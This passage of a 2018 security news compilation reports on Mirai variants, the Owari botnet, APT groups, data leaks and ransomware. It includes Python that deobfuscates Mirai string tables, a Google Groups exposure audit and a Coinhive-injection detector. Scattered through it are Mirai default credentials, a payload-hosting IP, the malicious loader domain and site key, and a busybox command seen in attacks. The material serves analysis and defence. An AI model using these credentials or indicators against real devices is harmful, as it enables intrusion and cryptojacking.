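# 0xde ^ 0xad ^ 0xbe ^ 0xef = 0x22.  Forks may swap the key, hence the
# parameter.
MIRAI_TABLE_KEY = 0xDEADBEEF


def effective_xor_byte(key=MIRAI_TABLE_KEY):
    """Collapse the four-byte XOR sequence into the single byte it amounts to."""
    k = 0
    for shift in (0, 8, 16, 24):
        k ^= (key >> shift) & 0xFF
    return k


def toggle_obf(data, key=MIRAI_TABLE_KEY):
    """Obfuscate or deobfuscate (XOR is its own inverse), as table.c's toggle does."""
    x = effective_xor_byte(key)
    return bytes(b ^ x for b in data)


def extract_strings(blob, key=MIRAI_TABLE_KEY, min_len=4):
    """Deobfuscate a blob and return the printable, NUL-terminated strings in it.

    Table entries carry a trailing NUL, so splitting on NUL after the XOR
    recovers the original entries; a wrong key yields no clean chunks.
    """
    plain = toggle_obf(blob, key)
    printable = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")
    found = []
    for chunk in plain.split(b"\x00"):
        if len(chunk) >= min_len and all(b in printable for b in chunk):
            found.append(chunk.decode("ascii"))
    return found


# Constructed example table: what the config area looks like once a fork has
# obfuscated it with the stock key.  The hostname is a placeholder.
SAMPLE_ENTRIES = [b"cnc.example.invalid", b"/bin/busybox", b"admin", b"xc3511"]
SAMPLE_BLOB = b"".join(toggle_obf(entry + b"\x00") for entry in SAMPLE_ENTRIES)


def demo():
    return extract_strings(SAMPLE_BLOB)


if __name__ == "__main__":
    print(hex(effective_xor_byte()), demo())
```

Because the whole scheme collapses to one XOR byte, a quick way to test an unknown sample is to brute-force all 256 values of that byte with extract_strings and keep the one that yields the most NUL-terminated printable chunks; JenX's hardcoded C2 address sits outside the table and will not surface this way.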

"Currently," writes ASERT, "it appears JenX only focuses on DDoS attacks against players of the video game Grand Theft Auto San Andreas, which has been noted by other researchers."

OMG is described by ASERT as one of the most interesting of Mirai variants. While it includes all Mirai's functionality, "the author expanded the Mirai code to include a proxy server." This allows it to enable a SOCKS and HTTP proxy server on the infected IoT device. "With these two features, the bot author can proxy any traffic of its choosing through the infected IoT device, including additional scans for new vulnerabilities, launching additional attacks, or pivot from the infected IoT device to other networks which are connected to the device."

Fortinet discussed OMG in February 2018. "This is the first time we have seen a modified Mirai capable of DDOS attacks as well as setting up proxy servers on vulnerable IoT devices. With this development, we believe that more and more Mirai-based bots are going to emerge with new ways of monetization," it concluded.

Wicked is the latest Mirai variant. "Similar to Satori variant 3," writes ASERT, "Wicked trades in Mirai's credential scanning function for its own RCE scanner. Wicked's RCE scanner targets Netgear routers and CCTV-DVR devices." When vulnerable devices are found, "a copy of the Owari bot is downloaded and executed."

However, an analysis of the same bot by Fortinet in May 2018 comes to a slightly different conclusion. The string 'SoraLOADER' suggests a purpose to distribute the Sora botnet. Further analysis showed that in practice it attempted to download the Owari botnet, but actually downloaded the Omni botnet. "We can essentially confirm that the author of the botnets Wicked, Sora, Owari, and Omni are one and the same. This also leads us to the conclusion that while the WICKED bot was originally meant to deliver the Sora botnet, it was later repurposed to serve the author's succeeding projects," says Fortinet.

The Mirai developer may have been apprehended, but because he made the source code public, Mirai and its variants continue to grow. The IoT ecosphere that Mirai and its variants target and exploit is still in its infancy. There were nearly 17 billion connected devices in 2017, and this number is expected to rise to around 125 billion by 2030 according to a new analysis from IHS Markit. Vendors continue to rush their products to market in order to gain early market share, but often at the cost of built-in security.

"Malware authors will continue to leverage IoT based malware in automated fashion, quickly increasing the botnet size through worm-like spreading, network proxy functionality, and automated exploitation of vulnerabilities in internet facing devices. It is important for organizations to apply proper patching, updates, and DDoS mitigation strategies to defend their organizations," warns ASERT.


It’s not a joke, Owari botnet operators used root as username and password to access a C&C
6.6.2018 securityaffairs BotNet

Security expert Ankit Anubhav discovered a Command and Control server for the Owari botnet protected with weak credentials.
An IoT botnet has been commandeered by white hats after its controllers used a weak username and password combination for its command-and-control server.

Security expert Ankit Anubhav from Newsky Security discovered an IoT botnet controlled through a poorly configured infrastructure: the botmaster used weak credentials for authentication to the command-and-control server.

The researchers exploited the weak configuration to take over the MySQL server used to control the Owari botnet; the author left port 3306 open, allowing authentication with “root” as both username and password.

“We observed few IPs attacking our honeypots with default credentials, with executing commands like /bin/busybox OWARI post successful login. In one of the cases, a payload hosted on 80(.)211(.)232(.)43 was attempted to be run post download.

When we investigated the IP, we observed that port 3306, the default port for MySQL database, was open.” reads the blog post published by Ankit Anubhav.

“We tried to investigate more into this IP. To our surprise, it is connected to the attacker’s servers using one of the weakest credentials known to mankind.

Username: root
Password: root“

The situation is paradoxical considering that Mirai-based botnets, including Owari, spread through Internet-of-Things devices by brute-force guessing passwords and taking advantage of default credentials.

The database investigation allowed the expert to discover a User table that contains login credentials for the various users who control the botnet. Some entries could be associated with botmasters, others with customers of the botnet.

“User table contains login credentials for various users who will control the botnet. Some of them can be botnet creators, or some can simply be the customers of the botnet, a.k.a black box users, who pay a sum of money to launch DDoS attacks. Besides credentials, duration limit such as for how much time the user can perform the DDoS, maximum available bots for attack (-1 means the entire botnet army of the bot master is available) and cooldown time (time interval between the two attack commands) can also be observed.” continues the expert.

“In the specific Owari case, we observe one user with duration limit of 3600 seconds with permissible bot usage set as -1(maximum). It is to be noted that the credentials of all these botnet users are also weak.”

Owari botnet

The expert also discovered a history table containing information on the DDoS attacks carried out against various targets. Some of the IP addresses targeted by the botnet were associated with rival IoT botnets.

Anubhav also investigated the revenue model behind the Owari botnet; he was able to reach a known Owari operator who goes online as “Scarface” and who provided the following comment:

“For 60$ / month, I usually offer around 600 seconds of boot time, which is low compared to what other people offer. However, it is the only way I can guarantee a stable bot count.” explained Scarface.

“I can’t allow having 10+ people doing concurrent attacks of 1800 seconds each. Usually there is no cooldown on my spots. If I decide to give the cooldown, it’s about 60 seconds or less. 60$/month is not much but when you get 10–15 customers per month it is enough to cover most of my virtual expenses”

Is this the end for the Owari botnet?

Of course not. Even if the expert has taken over the MySQL database, botnet operators continuously change attack IPs to remain under the radar, even when the malicious traffic associated with some of their IPs is detected.

The IPs reported in the analysis of the expert are already offline.


North Korea-Linked Covellite APT group stopped targeting organizations in the U.S.
6.6.2018 securityaffairs APT

A North Korea-linked APT group, tracked by experts at industrial cybersecurity firm Dragos as Covellite, has stopped targeting US organizations.
However, the group, which is believed to be linked to the notorious Lazarus APT group, continues to target organizations in Europe and East Asia.

The group has been around at least since 2017 and is still active; the APT has targeted civilian electric energy organizations to steal intellectual property and gather intelligence on industrial operations.

Unlike other threat actors that focus on industrial control systems, Covellite seems not to be interested in sabotage.

In September 2017, experts from FireEye spotted a wave of attacks launched by the APT group against U.S. electric companies; the phishing messages used weaponized Word documents to deliver a piece of malware.

“COVELLITE compromises networks associated with civilian electric energy worldwide and gathers intelligence on intellectual property and internal industrial operations. COVELLITE lacks an industrial control system (ICS) specific capability at this time.” reads the post published by Dragos.

“COVELLITE operates globally with targets primarily in Europe, East Asia, and North America. US targets emerged in September 2017 with a small, targeted phishing campaign directed at select U.S. electric companies.”

The experts linked the attacks to Pyongyang and confirmed that the group did not show the ability to disrupt power supply.

Covellite

According to Dragos, the infrastructure and the malicious code used by the COVELLITE group are similar to the ones used by the LAZARUS APT GROUP, aka Hidden Cobra.

“technical analysis of COVELLITE malware indicates an evolution from known LAZARUS toolkits. However, aside from technical overlap, it is not known how the capabilities and operations between COVELLITE and LAZARUS are related.” continues the post.

“Given the group’s specific interest in infrastructure operations, rapidly improving capabilities, and history of aggressive targeting, Dragos considers this group a primary threat to the ICS industry.”

Dragos experts have recently published reports on other hacker groups focused on ICS and SCADA systems, including Iran-linked Chrysene, Russia-linked Allanite, and Xenotime.


Thousands of organizations leak sensitive data via misconfigured Google Groups
6.6.2018 securityaffairs Security

Security experts reported that a widespread Google Groups misconfiguration exposes sensitive information.
Administrators of organizations using Google Groups and G Suite must review their configuration to avoid the leakage of internal information.

Security researchers from Kenna Security have recently discovered that 31 percent of the 9,600 organizations analyzed are leaking sensitive e-mail information.

The list of affected entities also includes Fortune 500 companies, hospitals, universities and colleges, newspapers and television stations, and even US government agencies.

“Organizations utilizing G Suite are provided access to the Google Groups product, a web forum directly integrated with an organization’s mailing lists. Administrators may configure a Google Groups interface when creating a mailing list.” reads the blog post published by Kenna Security.

“Due to complexity in terminology and organization-wide vs group-specific permissions, it’s possible for list administrators to inadvertently expose email list contents. In practice, this affects a significant number of organizations”

The discovery is not new, back in 2017 experts discovered wrong configurations of G Suite that can lead to data leakage.

Unfortunately, since the first advisory published by experts at RedLock, many installs continue to leak data. According to Kenna Security, the main reason is Google Groups uses a complex terminology and organisation-wide vs group-specific permissions.

When a G Suite admin creates a Groups mailing list for specific recipients, a Web interface for the list is also configured, available to users at https://groups.google.com.

Google Groups privacy settings can be adjusted on both a domain and a per-group basis. In affected organizations, the Groups visibility setting, reachable by searching “Groups Visibility” after logging into https://admin.google.com, is configured to “Public on the Internet”.

Google Groups

To discover if an organization is affected, administrators can browse to the configuration page by logging into G Suite as an administrator and typing “Settings for Groups for Business” or simply using this direct link.

“In almost all cases – unless you’re explicitly using the Google Groups web interface – this should be set to “Private”.” continues the post.

“If publicly accessible, you may access your organization’s public listing at the following link: https://groups.google.com/a/[DOMAIN]/forum/#!forumsearch/”

Administrators have to set the Google Group to private to protect internal information such as customer reviews, invoices payable, password recovery / reset e-mails, and more.

It is important to highlight that Google doesn’t consider this configuration issue a vulnerability. Experts recommend that administrators read the Google Groups documentation and set the sharing setting for “Outside this domain – access to groups” to “private”.
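As an added example (not Kenna Security's or Google's code), the following Python audits per-group visibility against the domain-wide setting the post describes, so that an admin can see which lists an outsider or a non-member could read. It assumes the per-group dicts have the shape of the Groups Settings API `groups.get` response (an `email` and a `whoCanViewGroup` field) and that the domain-wide “Outside this domain – access to groups” setting caps what any single group can expose; the tenant and group names are constructed.

```python
from dataclasses import dataclass
from typing import Dict, Iterable, List

# Per-group `whoCanViewGroup` values (assumption: the enum strings returned
# by the Groups Settings API, groupssettings v1).
ANYONE_CAN_VIEW = "ANYONE_CAN_VIEW"
ALL_IN_DOMAIN_CAN_VIEW = "ALL_IN_DOMAIN_CAN_VIEW"
ALL_MEMBERS_CAN_VIEW = "ALL_MEMBERS_CAN_VIEW"

# The two values of the domain-wide "Outside this domain - access to groups"
# setting named in the post.
DOMAIN_PUBLIC = "Public on the Internet"
DOMAIN_PRIVATE = "Private"


@dataclass
class Finding:
    group: str        # group e-mail address
    exposure: str     # "public" (whole Internet) or "domain" (any org user)
    listing_url: str  # where the archive can be browsed, per the post


def effective_exposure(domain_setting: str, who_can_view: str) -> str:
    """Combine the domain-wide and per-group settings into one exposure level.

    Assumption: the domain-wide setting acts as a ceiling. A group set to
    ANYONE_CAN_VIEW is reachable from the Internet only while the domain is
    "Public on the Internet"; once the domain is "Private" the same group is
    visible at most to users of the domain.
    """
    if who_can_view == ANYONE_CAN_VIEW:
        return "public" if domain_setting == DOMAIN_PUBLIC else "domain"
    if who_can_view == ALL_IN_DOMAIN_CAN_VIEW:
        return "domain"
    return "members"  # ALL_MEMBERS_CAN_VIEW and the manager/owner-only values


def public_listing_url(domain: str) -> str:
    # Listing URL format quoted from the Kenna Security post.
    return f"https://groups.google.com/a/{domain}/forum/#!forumsearch/"


def audit_groups(domain: str, domain_setting: str,
                 groups: Iterable[Dict[str, str]]) -> List[Finding]:
    """Return every group that someone other than its members could read."""
    findings: List[Finding] = []
    for settings in groups:
        exposure = effective_exposure(
            domain_setting, settings.get("whoCanViewGroup", ALL_MEMBERS_CAN_VIEW))
        if exposure == "members":
            continue
        findings.append(Finding(settings["email"], exposure,
                                public_listing_url(domain)))
    # Internet-readable lists first, then alphabetically.
    return sorted(findings, key=lambda f: (f.exposure != "public", f.group))


# Constructed sample: what `groups.get` would return for three lists of a
# hypothetical tenant, trimmed to the fields this audit needs.
SAMPLE_DOMAIN = "example.com"
SAMPLE_GROUPS = [
    {"email": "invoices@example.com", "whoCanViewGroup": ANYONE_CAN_VIEW},
    {"email": "all-staff@example.com", "whoCanViewGroup": ALL_IN_DOMAIN_CAN_VIEW},
    {"email": "security@example.com", "whoCanViewGroup": ALL_MEMBERS_CAN_VIEW},
]

if __name__ == "__main__":
    for setting in (DOMAIN_PUBLIC, DOMAIN_PRIVATE):
        print(f"domain-wide setting: {setting}")
        for f in audit_groups(SAMPLE_DOMAIN, setting, SAMPLE_GROUPS):
            print(f"  {f.group}: {f.exposure} ({f.listing_url})")
```

Run as-is, the same `invoices@` list shows up as Internet-readable while the domain is public and drops to domain-only once the domain-wide setting is flipped to Private, which is the one change the post recommends.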


Updated: Microsoft reportedly acquires the GitHub popular code repository hosting service
6.6.2018 securityaffairs IT

Microsoft has reportedly acquired the popular code repository hosting service GitHub, but at the time of writing there is no news about how much Microsoft paid for the platform.
GitHub was last valued at $2 billion in 2015, but at the time of writing there is no news about how much Microsoft paid for the platform.

“The software maker has agreed to acquire GitHub, the code-repository company popular with many software developers, and could announce the deal as soon as Monday, according to people familiar with the matter.” reported a post published by Bloomberg.

GitHub’s board decided to sell to Microsoft because of the leadership of Microsoft’s CEO Satya Nadella and his vision of open source technology.

GitHub currently hosts more than 80 million code repositories and has a privileged position in the software development community; the company that owns the platform could gain strategic benefits from its knowledge of the projects hosted there.

Of course, part of the open source community disagrees with the GitHub move and is opting to switch to competitor services such as BitBucket or GitLab.

Bryan Lunduke (@BryanLunduke), 6:21 PM - Jun 2, 2018:
To those that have @GitHub accounts:

If @Microsoft buys GitHub... would you continue to use it? Or would you move your repositories to a different service?

Poll (632 votes, final results): 32% Stick with GitHub, 68% Move to another service

Many development teams fear Microsoft could abuse its position after the acquisition, gaining full access to the millions of private projects hosted on GitHub.

The code hosting service GitLab has seen a massive traffic spike after news of the deal, with thousands of projects and code repositories being transferred from GitHub.

code repository GitHub deal

At the time of writing, neither Microsoft nor GitHub has commented on the acquisition deal.
Updated on June 4
In a blog post published today, Microsoft confirmed that it will acquire GitHub for $7.5 billion in Microsoft stock.

“GitHub will retain its developer-first ethos and will operate independently to provide an open platform for all developers in all industries. Developers will continue to be able to use the programming languages, tools and operating systems of their choice for their projects — and will still be able to deploy their code to any operating system, any cloud and any device.” reads the blog post.

“Microsoft Corporate Vice President Nat Friedman, founder of Xamarin and an open source veteran, will assume the role of GitHub CEO. GitHub’s current CEO, Chris Wanstrath, will become a Microsoft technical fellow, reporting to Executive Vice President Scott Guthrie, to work on strategic software initiatives.”


NYT: Facebook APIs gave device makers deep access to user data. FB disagrees
6.6.2018 securityaffairs Social

Facebook APIs granted access to the data belonging to FB users to more than 60 device makers, including Amazon, Apple, Microsoft, Blackberry, and Samsung so that they could implement Facebook messaging functions.
After the Cambridge Analytica privacy scandal, Facebook is now facing new problems because it is accused of sharing user data with over 60 device-makers.

The social network giant had granted access to the data belonging to its users to more than 60 device makers, including Amazon, Apple, Microsoft, Blackberry, and Samsung so that they could implement Facebook messaging functions, “Like” buttons, address books, and other features without requiring their users to install a separate app.

“Facebook has reached data-sharing partnerships with at least 60 device makers — including Apple, Amazon, BlackBerry, Microsoft and Samsung — over the last decade, starting before Facebook apps were widely available on smartphones, company officials said.” states the New York Times.

“The deals allowed Facebook to expand its reach and let device makers offer customers popular features of the social network, such as messaging, “like” buttons and address books.”

The controversial practice started more than 10 years ago, before Facebook apps were widely available on smartphones.

The partnerships raise concerns about the company’s privacy protections and compliance with a 2011 consent decree with the Federal Trade Commission. The decree barred the social network giant from sharing data of users’ Facebook friends with other companies without their explicit consent.
Facebook APIs- Cambridge Analytica
To support the accusation, Michael LaForgia, a New York Times reporter, used a 2013 Blackberry device to access his Facebook account with roughly 550 friends.

He discovered that a BlackBerry app called “The Hub” was still able to harvest private data from 556 of his friends, exposing info including religious and political orientation.

The reporter also discovered that The Hub was able to acquire “identifying information” for up to 294,258 friends of his Facebook friends.

“After connecting to Facebook, the BlackBerry Hub app was able to retrieve detailed data on 556 of Mr. LaForgia’s friends, including relationship status, religious and political leanings and events they planned to attend.” continues the NYT.

“Facebook has said that it cut off third parties’ access to this type of information in 2015, but that it does not consider BlackBerry a third party in this case.”

Facebook responded to the accusation of the NYT report in a blog post entitled “Why We Disagree with The New York Times.”

The social network confirmed that the Facebook APIs were created to allow device-makers to improve the experience of Facebook users by implementing features on their operating systems; at the time, there were no apps.

“The New York Times has today written a long piece about our device-integrated APIs — software we launched 10 years ago to help get Facebook onto mobile devices.” states the post published by Facebook.

“In the early days of mobile, the demand for Facebook outpaced our ability to build versions of the product that worked on every phone or operating system. It’s hard to remember now, but back then there were no app stores.”

“So companies like Facebook, Google, Twitter and YouTube had to work directly with operating system and device manufacturers to get their products into people’s hands. This took a lot of time—and Facebook was not able to get to everyone.”

“To bridge this gap, we built a set of device-integrated APIs that allowed companies to recreate Facebook-like experiences for their individual devices or operating systems. Over the last decade, around 60 companies have used them—including many household names such as Amazon, Apple, Blackberry, HTC, Microsoft, and Samsung.”

The company added that it carefully monitored the use of the Facebook APIs to prevent abuse, and that device vendors signed agreements that prevented Facebook users’ information from being used for other purposes.

“Partners could not integrate the user’s Facebook features with their devices without the user’s permission. And our partnership and engineering teams approved the Facebook experiences these companies built,” continues the post.

“Contrary to claims by the New York Times, friends’ information, like photos, was only accessible on devices when people made a decision to share their information with those friends. We are not aware of any abuse by these companies.”

Facebook APIs mobile devices

After more than ten years things have changed, and the Cambridge Analytica scandal has made users aware of the importance of their privacy.

Today both the Facebook iOS and Android apps are very popular and the criticized Facebook APIs are no longer used; for this reason, the company began “winding down” the partnerships in April.

“This is very different from the public APIs used by third-party developers, like Aleksandr Kogan. These third-party developers were not allowed to offer versions of Facebook to people and, instead, used the Facebook information people shared with them to build completely new experiences.” concluded Facebook.

“Now that iOS and Android are so popular, fewer people rely on these APIs to create bespoke Facebook experiences. It’s why we announced in April that we’re winding down access to them. We’ve already ended 22 of these partnerships. As always we’re working closely with our partners to provide alternative ways for people to still use Facebook.”


Iron cybercrime group uses a new Backdoor based on HackingTeam’s RCS surveillance sw
6.6.2018 securityaffairs Virus

Security experts at security firm Intezer have recently discovered a backdoor, associated with the operation of the Iron cybercrime group, that is based on the leaked source code of Remote Control System (RCS).
The Remote Control System (RCS) is the surveillance software developed by HackingTeam; it was considered a powerful malware that is also able to infect mobile devices for covert surveillance. RCS is able to intercept encrypted communication, including emails and VoIP voice calls (e.g. Skype); the mobile version, available for Apple, Android, Symbian, and Blackberry, is also able to completely control the handset and its components, including the camera, the microphone and the GPS module.

The Iron cybercrime group has been active since at least 2016. It is known for the Iron ransomware, but over the years it has built various strains of malware, including backdoors, cryptocurrency miners, and ransomware, to target both mobile and desktop systems.

“In April 2018, while monitoring public data feeds, we noticed an interesting and previously unknown backdoor using HackingTeam’s leaked RCS source code.” states the report published by Intezer.

“We discovered that this backdoor was developed by the Iron cybercrime group, the same group behind the Iron ransomware (rip-off Maktub ransomware recently discovered by Bart Parys), which we believe has been active for the past 18 months.”

Thousands of victims have been infected by malware used by the crime gang.

The new backdoor analyzed by the experts uses an installer protected with VMProtect and compressed using UPX, the malicious code is able to determine if it is running in a virtual machine.

The malware first drops and installs a malicious Chrome extension, creates a scheduled task, creates a mutex to ensure only one instance of itself is running, drops the backdoor dll to %localappdata%\Temp\\<random>.dat, then checks OS version to determine the backdoor to launch.

The malware halts its execution if it detects the presence of Qihoo 360 products. It also installs a malicious root CA certificate used to sign the backdoor binary, then creates a service pointing back to the backdoor.

The analysis of the backdoor revealed that it shares two main functions with the group’s IronStealer and Iron ransomware families: the VM detection code, which was borrowed from HackingTeam’s “Soldier” implant, and the DynamicCall module from HackingTeam’s “core” library.

iron cybercrime group backdoor extension

The malware used a patched version of the popular Adblock Plus chrome extension to inject both the in-browser crypto-mining module (based on CryptoNoter) and the in-browser payment hijacking module.

The extension constantly runs in the background, as a stealth host based crypto-miner. Every minute, the malware checks if Chrome is running, and can silently launch it if it doesn’t.

“The malicious extension is not only loaded once the user opens the browser, but also constantly runs in the background, acting as a stealth host based crypto-miner. The malware sets up a scheduled task that checks if chrome is already running, every minute, if it isn’t, it will “silent-launch” it” continues the analysis.

The backdoor also includes Adblock Plus for IE, which is capable of injecting remote JavaScript; this functionality, however, is no longer automatically used.

The malware automatically decrypts a hard coded shellcode that loads Cobalt Strike beacon in-memory, and fetches a payload URL from a hardcoded Pastebin address.

The malicious code is able to drop two pieces of malware: a variant of the “JbossMiner Mining Worm” tracked as Xagent, and the Iron ransomware.

The group used the malware to steal cryptocurrency from the victim’s workstation; the Iron backdoor drops the latest voidtool Everything search utility and silently installs it to find files likely to contain cryptocurrency wallets.

“IronStealer constantly monitors the user’s clipboard for Bitcoin, Monero & Ethereum wallet address regex patterns. Once matched, it will automatically replace it with the attacker’s wallet address so the victim would unknowingly transfer money to the attacker’s account,” explained the experts.

Further details, including the IoCs are reported in the blog post published by the researchers.


Over 115,000 Drupal Sites still vulnerable to Drupalgeddon2, a gift to crooks
6.6.2018 securityaffairs Vulnerability

Two months after the release of the security updates for the drupalgeddon2 flaw, experts continue to see vulnerable websites running on flawed versions of Drupal that hasn’t installed security patches.
In March, the Drupal developer Jasper Mattsson discovered a “highly critical” vulnerability, tracked as CVE-2018-7600, aka drupalgeddon2, affecting Drupal 7 and 8 versions.

Drupal 8.3.x and 8.4.x are no longer supported, but due to the severity of the flaw, the Drupal Security Team decided to address it with specific security updates that were issued a few days later.

The vulnerability could be exploited by an attacker to run arbitrary code on the CMS core component and take over a website just by accessing a URL.

After the publication of a working Proof-Of-Concept for Drupalgeddon2 on GitHub experts started observing attackers using it to deliver backdoors and crypto miners.

Two months after the release of the security updates, experts continue to see vulnerable websites running on flawed versions of Drupal that haven’t had the security patches installed.

According to the security researcher Troy Mursch, there are over 115,000 Drupal sites that haven’t installed the security patches for the drupalgeddon2 vulnerability.

The expert scanned the Internet for websites running the Drupal 7.x CMS version and found over 500,000 sites, 115,070 of them running outdated versions of the popular CMS that were vulnerable to the Drupalgeddon 2 flaw. The scan didn’t search for 6.x and 8.x sites.

“How many Drupal sites are vulnerable? To find the answer, I began by looking for sites using Drupal 7. This is the most widely used version, per Drupal’s core statistics. Using the source code search engine PublicWWW, I was able to locate nearly 500,000 websites using Drupal 7.” states a report published by Mursch.

“Upon completion of the scan I was able to determine:

115,070 sites were outdated and vulnerable.
134,447 sites were not vulnerable.
225,056 sites I could not ascertain the version used.”
Drupalgeddon2

The researcher found numerous vulnerable sites in the Alexa Top 1 Million, the list includes major US educational institutions, government organizations around the world, a large television network, a multinational mass media and entertainment conglomerate, and two major computer hardware manufacturers.

The expert shared the list of vulnerable websites with US-CERT and other CERT teams worldwide.

Mursch confirmed that cryptojacking campaigns are continuing even after his first report.

“While scanning for vulnerable sites, I discovered a new cryptojacking campaign targeting Drupal sites. One of the affected sites was a police department’s website in Belgium. This campaign uses the domain name upgraderservices[.]cf to inject Coinhive.” added the expert.

The expert published a Google Docs spreadsheet to track the original cryptocurrency mining campaign, the document includes now data on several different campaigns he discovered.

Bad Packets Report (@bad_packets), 9:37 AM - May 31, 2018:
This Belgium police website (http://votrepolice.be/ ) has been compromised and is now part of the Drupal cryptojacking campaign. pic.twitter.com/dJbqshysUg

Bad Packets Report (@bad_packets), 9:37 AM - May 31, 2018:
This case of #cryptojacking is caused by upgraderservices[.]cf/drupal.js which injects #Coinhive. Site key "ZQXBo9BIgCBhlxCYhc7UAWLJxBfRCVos" is used. pic.twitter.com/a9dxCfbR3s

The expert published IoCs for the campaign. The presence online of 115,000 vulnerable Drupal 7.x websites is very dangerous, a gift for crooks who can abuse them for a broad range of illegal activities.
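As an added example (not Mursch’s or Bad Packets Report’s tooling), the following Python checks a fetched page for the injection described in the tweets above, using the two indicators they quote: the upgraderservices[.]cf/drupal.js loader and the Coinhive site key. The sample HTML pages are constructed for this example.

```python
import re
from typing import Dict, List
from urllib.parse import urlparse

# Indicators quoted in the Bad Packets Report tweets (domain written
# undefanged here so it can be matched against real script URLs).
INJECTED_LOADER_HOST = "upgraderservices.cf"
KNOWN_SITE_KEY = "ZQXBo9BIgCBhlxCYhc7UAWLJxBfRCVos"

# External <script src=...> tags, including protocol-relative "//host/x.js".
SCRIPT_SRC_RE = re.compile(r"<script\b[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)
# The standard Coinhive embed: new CoinHive.Anonymous('<32-char site key>').
COINHIVE_CTOR_RE = re.compile(
    r"CoinHive\.(?:Anonymous|User)\s*\(\s*['\"]([A-Za-z0-9]{32})['\"]")
# Hosts the Coinhive library itself was served from.
COINHIVE_LIB_RE = re.compile(r"(?:^|//|\.)coin-?hive\.com/", re.I)


def _host_of(src: str) -> str:
    # urlparse only sees "//host/path" as a netloc when a scheme is present.
    if src.startswith("//"):
        src = "https:" + src
    return (urlparse(src).hostname or "").lower()


def scan_html(html: str) -> List[Dict[str, str]]:
    """Return one finding per indicator of the Drupal Coinhive injection."""
    findings: List[Dict[str, str]] = []
    for m in SCRIPT_SRC_RE.finditer(html):
        src = m.group(1)
        host = _host_of(src)
        if host == INJECTED_LOADER_HOST or host.endswith("." + INJECTED_LOADER_HOST):
            findings.append({"type": "injected_loader", "value": src})
        elif COINHIVE_LIB_RE.search(src):
            findings.append({"type": "coinhive_library", "value": src})
    for m in COINHIVE_CTOR_RE.finditer(html):
        key = m.group(1)
        findings.append({
            "type": "coinhive_sitekey",
            "value": key,
            # Same key as the reported campaign, or some other miner tenant.
            "campaign": "upgraderservices" if key == KNOWN_SITE_KEY else "unknown",
        })
    return findings


def is_cryptojacked(html: str) -> bool:
    return bool(scan_html(html))


# Constructed sample of a compromised Drupal 7 page: the site's own
# aggregated script, the injected loader, and the miner it sets up.
COMPROMISED_PAGE = """<html><head>
<script type="text/javascript" src="/sites/default/files/js/js_abc.js"></script>
<script src="https://upgraderservices.cf/drupal.js"></script>
<script>
var miner = new CoinHive.Anonymous('ZQXBo9BIgCBhlxCYhc7UAWLJxBfRCVos', {throttle: 0.5});
miner.start();
</script></head><body><p>Welcome</p></body></html>"""

# Constructed sample of a clean page with only first-party and CDN scripts.
CLEAN_PAGE = """<html><head>
<script type="text/javascript" src="/sites/default/files/js/js_clean.js"></script>
<script src="//cdn.example.org/jquery.min.js"></script>
</head><body><p>Drupal 7 site, no injection.</p></body></html>"""

if __name__ == "__main__":
    for name, page in (("compromised", COMPROMISED_PAGE), ("clean", CLEAN_PAGE)):
        print(name, scan_html(page))
```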


The author of the Sigrun Ransomware decrypts Russian victims’ files for free
6.6.2018 securityaffairs Ransomware

The author of the Sigrun Ransomware is providing the decryption key to Russian victims for free, while other victims have to pay a ransom of $2,500 worth of Bitcoin or Dash.
We have reported several cases where Russian malware authors avoid infecting computers in their country, but the case we are going to discuss is interesting too.

The author of the Sigrun Ransomware is providing the decryption key to Russian victims for free, while the malware demands the payment of a ransom of $2,500 worth of Bitcoin or Dash from other victims.

The case was first spotted by the malware researcher Alex Svirid, and other experts confirmed his discovery.

Alex Svirid (@thyrex2002), 31 May:
Sigrun Ransomware author free decrypt files for users from some countries former USSR (with Russian primary language)

S!Ri (@siri_urz), 3:36 PM - May 31, 2018:
Yup, many are doing that. Guess who is Russian and who is American? pic.twitter.com/1pS6NhPtXN

The Sigrun ransomware also avoids infecting Russian victims by detecting the keyboard layout; this behavior allows Russian vxers to avoid the attention of local authorities.

When Sigrun ransomware is executed, it will first check “HKEY_CURRENT_USER\Keyboard Layout\Preload” to determine if it is set to the Russian layout. If the machine is using a Russian layout, it will not encrypt its files and will delete itself.

Experts pointed out that the ransomware also infects users in the former USSR Republics because many of them don’t use the Russian keyboard layout for political reasons. For this reason, the authors of the Sigrun ransomware decided to provide the decryption key to Russian victims for free.

“Ukranian users don’t use russian layout because of political reasons. So we decided to help them if they was infected,” the Sigrun author told BleepingComputer via email.

“We have already added avoiding Ukrainian layout like was in Sage ransomware before.” They also told us that the email images above are not from Sigrun but another ransomware.

Lawrence Abrams from BleepingComputer has spoken with the author of the malware, who told him that he isn’t from the former USSR republics.

“Finally, the Sigrun developer told us that they are “not from former USSR republics. I added it because of my Belarus partners.” added Abrams.

When Sigrun ransomware is executed on a computer, it will scan a computer for files to encrypt, when it encrypts a file it will append the .sigrun extension to the encrypted file’s name. The malware creates two ransom notes named RESTORE-SIGRUN.txt and RESTORE-SIGRUN.html in each folder containing encrypted files.

Experts noticed that it doesn’t encrypt files that match certain extensions, filenames, or that are located in particular folders.

The ransom notes include information on the infection and payment instructions.

“At this time, the Sigrun Ransomware cannot be decrypted for free unless you are a Russian victim and the author helps you,” concluded Lawrence.

Further technical details, including IoCs, are reported in the analysis shared by BleepingComputer.


MyHeritage data breach – 92.3 million user credentials exposed
6.6.2018 securityaffairs Incident

A security researcher discovered email addresses and hashed passwords of roughly 92.3 million MyHeritage users stored on a private server outside the company.
The huge trove of data was contained in a file named “myheritage”; according to the experts, the information is authentic and comes from MyHeritage.

“Today, June 4, 2018 at approximately 1pm EST, MyHeritage’s Chief Information Security Officer received a message from a security researcher that he had found a file named “myheritage” containing email addresses and hashed passwords, on a private server outside of MyHeritage.” reads the data breach notification published by the company.

“Our Information Security Team received the file from the security researcher, reviewed it, and confirmed that its contents originated from MyHeritage and included all the email addresses of users who signed up to MyHeritage up to October 26, 2017, and their hashed passwords.”

MyHeritage offers a service for investigating family history and reconstructing the family tree through DNA analysis.

The expert who made the disconcerting discovery reported it to the company on June 4, 2018; the incident appears to affect users who signed up for the service on or before October 26, 2017.

The expert found only usernames and hashed passwords; no other information was discovered on the server hosting the file.

The company pointed out that the passwords were not stored in plain text, but did not explain the hashing mechanism used to protect them.

MyHeritage handles billing information through third parties, while DNA data and other sensitive data are stored on segregated systems.

At the time of the notification, the company had not observed any abuse of the compromised data.

“Since Oct 26, 2017 (the date of the breach) and the present we have not seen any activity indicating that any MyHeritage accounts had been compromised.” continues the notification.

